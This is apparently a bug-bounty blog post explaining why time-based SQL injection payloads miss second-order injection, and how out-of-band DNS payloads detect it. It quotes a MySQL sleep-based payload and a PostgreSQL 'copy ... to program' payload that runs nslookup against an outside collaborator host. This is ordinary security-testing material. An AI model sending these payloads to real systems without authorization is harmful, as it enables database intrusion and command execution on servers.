Super Blind SQL Injection- $20000 bounty | Thousands of targets still vulnerable
Core Concept
Time Based SQL Injection payload failed to detect SQL injection
XOR(if(now()=sysdate(),sleep(5),0))XOR
even though target is vulnerable with SQL injection.
OAST based SQL Injection payload detect it, but why ????.
copy (SELECT '') to program 'nslookup BURP-COLLABORATOR-SUBDOMAIN'
Idea
I saw this tweet of Kanhaiya Sharma (the legend)
here bro mention the time based SQL injection payload
XOR(if(now()=sysdate(),sleep(5),0))XOR
I find so many SQL injections with his payload.
So I start loving SQL Injections, to improve my knowledge more I revisit the portswigger labs of sqli.
Lots of labs solved with above mentioned time based SQL injection payload
XOR(if(now()=sysdate(),sleep(5),0))XOR
but this lab not solved with time based SQL injection payloads.
If the code is vulnerable with SQL Injection, then time based SQL Injection payload must work . I contact lot of other hackers of the community ( pro ones also ) , and ask if the code is vulnerable with SQL Injection, then it’s possible that time based payload will not detect sqli— everyone say it’s impossible that time based payload will not detect sqli.
I check lot of other hacker intruder sql injection payload wordlist — but none of the hacker use SQL injection using out-of-band (OAST) techniques based payload.
This made me curious, because lot of hacker not using OAST based SQL Injection payload, and only OAST based sqli payload solve this portswigger lab, so it may be possible that there are other target in the wild that are vulnerable like this, but not detected by other hackers because they are not using OAST based sqli payload. But the question is why time based sqli paylaod not work , again I carefully read the portswigger sqli study material and I find out.
Answer is written in portswigger
Let me explain you what’s written here with example .
Did you ever hear about blind XSS , it’s same like that.
Let say you send the request to server
https://example.com/?q={sqli}
Server securely with parameterized query process the parameter and send you the response.
But then server saved the q parameter value {sqli} to database for maybe analytics purpose and now this time code is vulnerable with sqli injection.
But you will never detect this thing, with time based sqli payload. because you will get your response in a proper time.
But if you used OAST sqli payload here, you will get a dns interactions and you will detect that code is vulnerable with sql injection . OAST sqli paylod for PostgreSQL ( https://portswigger.net/web-security/sql-injection/cheat-sheet)
copy (SELECT '') to program 'nslookup BURP-COLLABORATOR-SUBDOMAIN'
Hunting
I start hunting with OAST sqli payload and find lots of sql injection that are not possible to find with time based sqli payload.
Total bounty I made with only OAST based SQL Injection is $20000 in 1 months.
Conclusion
Use OAST based sqli payload if you want more SQL Injections.